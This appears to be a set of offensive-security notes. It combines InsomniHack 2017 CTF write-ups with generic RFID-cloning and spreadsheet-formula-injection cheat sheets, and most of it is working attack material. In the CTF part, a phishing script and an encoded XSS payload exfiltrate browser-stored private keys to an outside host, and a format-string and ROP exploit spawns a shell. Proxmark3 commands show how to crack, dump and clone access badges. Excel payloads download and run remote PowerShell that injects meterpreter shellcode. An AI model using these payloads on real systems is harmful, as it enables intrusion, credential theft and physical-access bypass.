# InsomniHack teaser 2k17: The Great Escape - part 2 - forensics - 200 pts


# ./certbot-auto

# cat phishing.py
from pwn import *

host = 'ssc.teaser.insomnihack.ch'
port = 25

r = remote(host, port)

expect = '(Ubuntu)'
line = 'ehlo ip-172-31-36-141.eu-west-1.compute.internal'
r.sendlineafter(expect, line)
expect = '250 SMTPUTF8'
line = 'mail FROM:<gr27@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'rcpt TO:<rogue@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'data'
r.sendlineafter(expect, line)
expect = '.<CR><LF>'
line = '''Content-Type: multipart/mixed; boundary="===============5398474817237612449=="
MIME-Version: 1.0
From: gr27@ssc.teaser.insomnihack.ch
To: rogue@ssc.teaser.insomnihack.ch
Date: Fri, 20 Jan 2017 11:51:27 +0000
Subject: Good links

--===============5398474817237612449==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Hello Rogue,

https://thegreatescape2.ddns.net/links.html

GR-27

--===============5398474817237612449==--
.\r\n'''
r.sendlineafter(expect, line)

# cat /var/www/html/links.html
<html>
     <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post">
          <input name="action" value="login" />
   <input name="name" value="<img src='a' onerror='javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,100,97,116,97,32,61,32,39,39,59,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,125,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,32,39,104,116,116,112,115,58,47,47,116,104,101,103,114,101,97,116,101,115,99,97,112,101,50,46,100,100,110,115,46,110,101,116,47,103,101,116,46,104,116,109,108,63,108,115,61,39,32,43,32,100,97,116,97,44,32,116,114,117,101,41,59,104,116,116,112,46,115,101,110,100,40,41,59,60,47,115,99,114,105,112,116,62))'/>"/>
         <input name="password" value="tge2"/>
        </form>
</html>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
       window.document.forms[0].submit();
         });
</script>

# python phishing.py
[+] Opening connection to ssc.teaser.insomnihack.ch on port 25: Done
[*] Closed connection to ssc.teaser.insomnihack.ch port 25

# tail -f /var/log/apache2/access.log
52.214.142.175 - - [29/Jan/2017:09:27:14 +0000] "GET /links.html HTTP/1.1" 200 4202 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
52.214.142.175 - - [29/Jan/2017:09:27:15 +0000] "GET /get.html?ls=INS{IhideMyVulnsWithCrypto}{"alg":"RSA-OAEP-256","d":"CFSPW_AU_cK07bOtdnzbj5MgBqdweDY04Ku-mHSrAIbDv3J_lHH-jCPQb5U2JR4v08eMXlz3AassULQr60rskdwjdPN7Nen15yRcRTsaoSyRTd2qM8O_U-K6Gy7Lvg_ld2HOlHNBBy2k8g8cP7cpjyy7Ebsk5MUNy_udx9aMs7497RaIrCFnpT7RztudkYBo_2Oy5xm6BcsV9059HBhbKbUqq6Ui9_BZ3H7sdwTqlYx3afVV5AgE61eEdWK7vK_yI65Ru_5_fOBWik7xf7fwPjf7COp1HfTZiFbCIWTUaXVe6ThfMoTdwT1wQ0wwuFdtpGTkk8d4XwGtDa8-_XbmIQ","dp":"hapJ7dlVsPvF9no_s-Nfnpv2dZ5a5_C2AyPo_-_mVi4-1a7HTkW9SyGg1KextCPYRAwQZ1wU3bL6P_4TjkrYiAAl-8Iq6moUqWuRY7G8vo3N_P3aBwjgyNTzk3eHfnUFP4QgGOooT2ZwyuDTDSbwKOesnD13q4U_vjtjcZaFU70","dq":"Ts_hwWPsLOjp-yJg0wbQEONeqbvNPLCChb5QJItXvUaL2JcN9muozrN1GZqu383-h8gZ-VUm3-CFU7OWeGYLa0PZlq1uGNvsdffgdNL3MYZ2KwMhXkwXKf45ePhx_ydiblYhb44cFtm0ffXKSPlvbyzLHvJ2_o8ggok0Lzu-weE","e":"AQAB","ext":true,"key_ops":["decrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ","p":"29_YD0m-NFoUTmst33E4p2VBDlCeQ1MJdr_7tO4ERF8aww0e8hu3jRq5PMHCEc8G8gA4q2kuXylIpaB5mWzcQplDDMgIDGupEnL_J0ynMcg-HUld8NDaya7mQWtLHvSEAoB-2MymBTJYaTwsvAYtTI8ruaqhMo4-cKjs5zQfmj0","q":"xz2B2WzMdesiDK7dzorVdJlBgIShj2cMRGwhXcSiWfbY2M4Y3DB_m8p5tdEUIU6g0oWbSfmaYF_MsQxijXRxxe17nuYssns2ue4hYm2xH4mTY6voeNhbOeu7LtOXepUWxN-5520suTvL74Lx9xwWrdeTGIF1_zECqbWRuFieSvk","qi":"VhY5UYLTv20Btpq4MlizFPSuuItbfmK61P0rqEXe-sYHTitMNDBOWDSwIqj4pHkDTFaOCG0o6z81MyVg_bmz2ODzkHDrJUeiOVSMISxlaeSRf2JhiVYMfXiWKJBGCP-PgWuHp5NwLwESZT3aZ0KBYSkE7jnfcttWbc0mYu1glWg"}{"alg":"RSA-OAEP-256","e":"AQAB","ext":true,"key_ops":["encrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ"}nullnullnullnullnullnull HTTP/1.1" 404 3761 "https://ssc.teaser.insomnihack.ch/api/user.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"

# InsomniHack teaser 2k17: The Great Escape - part 1 - forensics - 50 pts


Initial wireshark filters

smtp

Hello GR-27,

I'm currently planning my escape from this confined environment. I plan on using our Swiss Secure Cloud (https://ssc.teaser.insomniha.

I'll be checking this mail box every now and then if you have any information for me. I'm always interested in learning, so if you ha.

Rogue


ftp-data
-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQC5twyPH+2U6X0Q
uxOKPTHSR6MkXGSvAz+Ax+G9DKEiBLuTTfl7dNv4oswdmT9nWlSY1kxZatNwlUF8
...

edWr4Hzbiph0V1Dv/V+kmmreWBmHetH6bhrTWQq3UZ5WbGMpiTmSsD0EXU5vZLbX
xmZSEXjNvG9grjxwR96vp1PK/4Bq1jo=
-----END PRIVATE KEY-----

Decrypt HTTPS traffic

Preferences/Protocols/SSL/RSA keys list/Edit: 52.214.142.175 443 http rsaprivate.key

New wireshark filters

ip.addr == 52.214.142.175 and http and tcp.stream eq 76

  $scope.downloadFile = function(id) {
    console.log("Download file " + id);
    $http.get("https://ssc.teaser.insomnihack.ch/api/files.php?action=download&id="+id,{withCredentials: true}).then(function(response) {
      var name = response.data.name;
      var content = JSON.parse(response.data.content);
      var key = Keys.getPrivKey();
      crypto.subtle.decrypt({name:"RSA-OAEP"},key,$scope._Base64ToArrayBuffer(content.sessionkey)).then(function(sesskey) {
        
        crypto.subtle.importKey('raw', sesskey, {name:"AES-CBC"},true,['encrypt','decrypt']).then(function(realsesskey) {
          console.log("Session key:" + realsesskey);
          window.crypto.subtle.decrypt({name: "AES-CBC", iv: $scope._Base64ToArrayBuffer(content.iv)}, realsesskey, $scope._Base64ToArrayBuffer(content.file)).then(function(dec) {
            console.log(dec);
            var blob = new Blob([dec], {type: 'application/octet-stream'});
            var url = window.URL.createObjectURL(blob);
            var anchor = document.createElement("a");
            anchor.download = name;
            anchor.href = url;
            anchor.click();
            window.URL.revokeObjectURL(url);
            anchor.remove();
          },function(e){console.log(e);});
        },function(e){console.log(e);});
        
      },function(response){console.log(response);});
    }, function(response){console.log(response);});
  }

  $scope.submitForm = function() {
    var file = document.getElementById('uploadFile').files[0];
    var reader = new FileReader();
    var pubKey = Keys.getPubKey();
    reader.onload = function(e) {
      var cleartext = e.target.result;
      window.crypto.subtle.generateKey(
          {name: "AES-CBC", length: 128}, 
          true, 
          ["encrypt", "decrypt"]).then(function(key) {
            var iv = window.crypto.getRandomValues(new Uint8Array(16));
            var sessionkey = key;
            window.crypto.subtle.encrypt({name: "AES-CBC", iv: iv}, key, cleartext).then(function(enc) {
              console.log(enc);
              var encfile = enc;
              console.log("sesskey : " + sessionkey);
              crypto.subtle.exportKey('raw', sessionkey).then(function(exportedKey){
                crypto.subtle.encrypt({name:"RSA-OAEP"},pubKey,exportedKey).then(function(encrypted) {
                  var res = {sessionkey: $scope._arrayBufferToBase64(encrypted), iv: $scope._arrayBufferToBase64(iv), file: $scope._arrayBufferToBase64(encfile)};

                  //console.log(JSON.stringify(res));
                  $http({
                    method: 'POST',
                    url: "https://ssc.teaser.insomnihack.ch/api/files.php",
                    data: "action=upload&file="+encodeURIComponent(JSON.stringify(res))+"&name="+encodeURIComponent(file.name),
                    headers : {'Content-Type': 'application/x-www-form-urlencoded'},
                    withCredentials: true,
                  }).then(function(response) {
                    if(response.data.status == 'SUCCESS') {
                      $scope.getFiles();
                    }
                  }, function(response) {console.log(response);});
                });
              });
              
            }
          );
          });
        
    
    $scope.generateKeys = function() {
      console.log("Generating keys");
      window.crypto.subtle.generateKey({
              name: "RSA-OAEP",
              modulusLength: 2048, //can be 1024, 2048, or 4096
              publicExponent: new Uint8Array([0x01, 0x00, 0x01]),
              hash: {name: "SHA-256"}, //can be "SHA-1", "SHA-256", "SHA-384", or "SHA-512"
          },
          true, //whether the key is extractable (i.e. can be used in exportKey)
          ["encrypt", "decrypt"] //must be ["encrypt", "decrypt"] or ["wrapKey", "unwrapKey"]
      )
      .then(function(key){
          window.crypto.subtle.exportKey("jwk",key.publicKey).then(function(key) {
            localStorage.setItem("publicKey",JSON.stringify(key));
          });
          window.crypto.subtle.exportKey("jwk",key.privateKey).then(function(key) {
            localStorage.setItem("privateKey",JSON.stringify(key));
          });
          
      })
      .catch(function(err){
          console.error(err);
      });


ip.addr == 52.214.142.175 and http and tcp.stream eq 85

POST /api/files.php HTTP/1.1
Host: ssc.teaser.insomnihack.ch
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://ssc.teaser.insomnihack.ch/files
Content-Length: 20877
Cookie: PHPSESSID=3u5dqmfudc7ap1di0nmfjgtjm3
FLAG: INS{OkThatWasWay2Easy}
Connection: keep-alive

action=upload&file={
"sessionkey":"FDtHceahcvssOYVXpOBBdOqi5ZRCKqQI0wAg9kLZYPeG2tWeQw5GTTciwOu4AvTTfmt6S7RHtzhUuro0vFAfbeoKm/Uu3aoXY2XgBsgzcskszOzEKBD62k5yUGNHsFA1zGv8SsE8ERLD3C+O1WY24lpPgA9Me7p3wM5msnTrIS0OUFVEhAYytoqkKsvP+OgNs+o3Ch/FJZHam9V4eE6PU/1G3HhbIesIO9a5hFHHTUPLY/n6boZyS3I262zlGVOPd0R5dPg30J83nxixE1hedIkDQlNpLUNGBMa/vMsM0ViTh2AaLSmJZdPqOGlWn3PRAMnhgKk+fhROGsPHfpIq5w==",
"iv":"WSjrrrgGlOKiWKsWA5twjA==",
"file":"qkOqULxFivAN3uOwax9iCPZSrBcNtk172Rcfe7iDu...k0TUlSPBO"}&name=rogue

# InsomniHack teaser 2k17: baby - pwn - 50 pts


Binary info

# file baby
baby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, not stripped
# ./checksec.sh --file baby
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   baby
# ./checksec.sh --file libc.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    DSO             No RPATH   No RUNPATH   libc.so

Partial RELRO and Full RELRO

+ PLT --> GOT
known: GOT --> shared lib address
unknown: GOT --> PLT --> dynamic linker (lazy binding)

+ Partial RELRO (Relocation Read Only)

- read only after dynamic loader initialization: .init_array, .fini_array, .jcr .dynamic .got
- read-only: .got
- writeable: .got.plt

+ Full RELRO

- partial relro
- lazy binding disabled: imported symbols resolved at startup time.
- read-only: .got, .got.pl


Disable SIGALRM

(gdb) info signals SIGALRM
Signal        Stop Print Pass to program Description
SIGALRM       No No Yes  Alarm clock
(gdb) handle SIGALRM nopass
Signal        Stop Print Pass to program Description
SIGALRM       No No No  Alarm clock

__libc_start_main address range

(gdb) disassemble __libc_start_main
0x00007ffff7a5c1c0
0x00007ffff7a5c385

Find a __libc address

Your format > %158$llp
0x7ffff7a5c2b1

(gdb) x/3i 0x7ffff7a5c2b1
   0x7ffff7a5c2b1 <__libc_start_main+241>: mov    edi,eax
   0x7ffff7a5c2b3 <__libc_start_main+243>: call   0x7ffff7a71960 <__GI_exit>
   0x7ffff7a5c2b8 <__libc_start_main+248>: xor    eax,eax

Find libc base address

# objdump -M intel -d libc.so | grep -A 2 'mov    edi,eax'
   20830: 89 c7                 mov    edi,eax
   20832: e8 f9 97 01 00        call   3a030 <exit@@GLIBC_2.2.5>
   20837: 31 d2                 xor    edx,edx

Find cookie address

Your format > %138$llp
0x3277851dfc60e000

gdb config file

# cat .gdbinit
set follow-fork-mode child
handle SIGALRM nopass
set environment LD_PRELOAD=./libc.so
set disassembly-flavor intel

Exploit

# cat baby.py
from pwn import *

host = 'baby.teaser.insomnihack.ch' # '127.0.0.1'
port = 1337

def leak_address(pos):
    r.sendlineafter('> ', '2')
    r.sendlineafter('> ', pos)
    address = r.recvline()
    r.sendlineafter('> ', '')
    return address

def give_me_a_shell(payload):
    r.sendlineafter('> ', '1')
    r.sendlineafter('? ', str(len(payload) + 1))
    r.sendline(payload)
    r.interactive()

context.clear()
context.arch = 'amd64'
print '[+] Arch = ' + context.arch

r = remote(host, port)

cookie = int(leak_address('%138$llp'), 16)
libc = int(leak_address('%158$llp'), 16)

elf = ELF('libc.so')
elf.address = libc - 0x20830
print '[+] libc base = ' + hex(elf.address)

padding = '\x90' * 1032
cookie = p64(cookie)
rbp = cookie
rop = ROP(elf)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(elf.search('/bin/sh\x00').next())
print '[+] rop\n' + rop.dump()

payload = padding + cookie + rbp + rop.chain()
give_me_a_shell(payload)

# python baby.py
[+] Arch = amd64
[+] Opening connection to baby.teaser.insomnihack.ch on port 1337: Done
[*] 'libc.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] libc base = 0x7f129d29e000
[*] Loaded cached gadgets for 'libc.so'
[+] rop
0x0000:   0x7f129d2bf102 pop rdi; ret
0x0008:              0x4
0x0010:   0x7f129d2be2e8 pop rsi; ret
0x0018:              0x0
0x0020:   0x7f129d394d90 dup2
0x0028:   0x7f129d29e937 <adjust: ret>
0x0030:   0x7f129d2bf102 pop rdi; ret
0x0038:              0x4
0x0040:   0x7f129d2be2e8 pop rsi; ret
0x0048:              0x1
0x0050:   0x7f129d394d90 dup2
0x0058:   0x7f129d29e937 <adjust: ret>
0x0060:   0x7f129d2bf102 pop rdi; ret
0x0068:              0x4
0x0070:   0x7f129d2be2e8 pop rsi; ret
0x0078:              0x2
0x0080:   0x7f129d394d90 dup2
0x0088:   0x7f129d29e937 <adjust: ret>
0x0090:   0x7f129d2bf102 pop rdi; ret
0x0098:   0x7f129d42a177
0x00a0:   0x7f129d2e3390 system
0x00a8:       'raabsaab' <pad>
[*] Switching to interactive mode
Good luck !
$ cat flag
INS{if_you_haven't_solve_it_with_the_heap_overflow_you're_a_baby!}

# RFID cracking


EM

# Cloning EM410x
proxmark3> lf read
proxmark3> data samples 30000
proxmark3> lf em4x em410xread
EM TAG ID      : 0DEADBEEF0
proxmark3> lf em4x em410xsim 0DEADBEEF0
proxmark3> lf em4x em410xwrite 0DEADBEEF0 1

# Bruteforcing UID - https://github.com/mtongsang/pm3Bruter
$ ./proxmark3 /dev/cu.usbmodem1411 -b -m 3 -c 256 -t 1122334455

Mifare classic 1k

# Key A for sector 0
proxmark3> hf mf mifare
Found valid key: a0a1a2a3a4a

# Keys A/B for all sectors
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d

# Dumping and reading stored data
proxmark3> hf mf dump
proxmark3> script run htmldump
$ xxd dumpkeys.bin
$ xxd dumpdata.bin

# Reading and writing blocks and sectors
proxmark3> hf mf rdbl 0 A a0a1a2a3a4a5
proxmark3> hf mf rdsc 0 A a0a1a2a3a4a5
proxmark3> hf mf wrbl 0 A a0a1a2a3a4a5
0300e5c81c0eec00000000004d494300

# Cloning a dumped tag (dumpdata.bin) using a magic chinnese card
proxmark3> hf mf csetuid 86bcfe41
proxmark3> hf mf restore

# Simulating a tag
proxmark3> hf 14a reader
 UID : 11 22 33 44
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proxmark3> hf 14a sim 1 11223344

Pyramid

# Cloning: read raw data
proxmark3> lf search
Pyramid ID Found - BitLength: 90 -unknown BitLength- (ABCDE), Raw: 11111111222222223333333344444444                                                         
Checksum XX passed
Valid Pyramid ID Found!

# Cloning: write raw data
proxmark3> lf t55xx write b 0 d 00107080
Writing page 0  block: 00  data: 0x00107080
proxmark3> lf t55xx write b 1 d 11111111
Writing page 0  block: 01  data: 0x11111111
proxmark3> lf t55xx write b 2 d 22222222
Writing page 0  block: 02  data: 0x22222222
proxmark3> lf t55xx write b 3 d 33333333
Writing page 0  block: 03  data: 0x33333333
proxmark3> lf t55xx write b 4 d 44444444
Writing page 0  block: 04  data: 0x44444444

# Excel formula injection


# cat payloads.txt
=cmd|'/C calc.exe'!Z
=cmd|'/C "%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe iex (new-object net.webclient).downloadstring(\"http://192.168.1.1/meterpreter.ps\")"'!Z

# cat meterpreter.ps
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');
$e=ps explorer;
$p=$e.id;
invoke-shellcode -shellcode
# msfvenom --platform windows --payload 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x48,0x31,0xc0,0x50,0x50,0x49,0xbc,0x02,0x00,0x04,0xd2,0x00,0x00,0x00,0x00,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x02,0x59,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x48,0x31,0xd2,0x48,0x89,0xf9,0x41,0xba,0xb7,0xe9,0x38,0xff,0xff,0xd5,0x4d,0x31,0xc0,0x48,0x31,0xd2,0x48,0x89,0xf9,0x41,0xba,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x48,0x89,0xf9,0x48,0x89,0xc7,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x48,0x81,0xc4,0xb0,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7,0x58 -force -processid $p

Reference

https://appsec-labs.com/portal/formula-injection/

Thanks

ams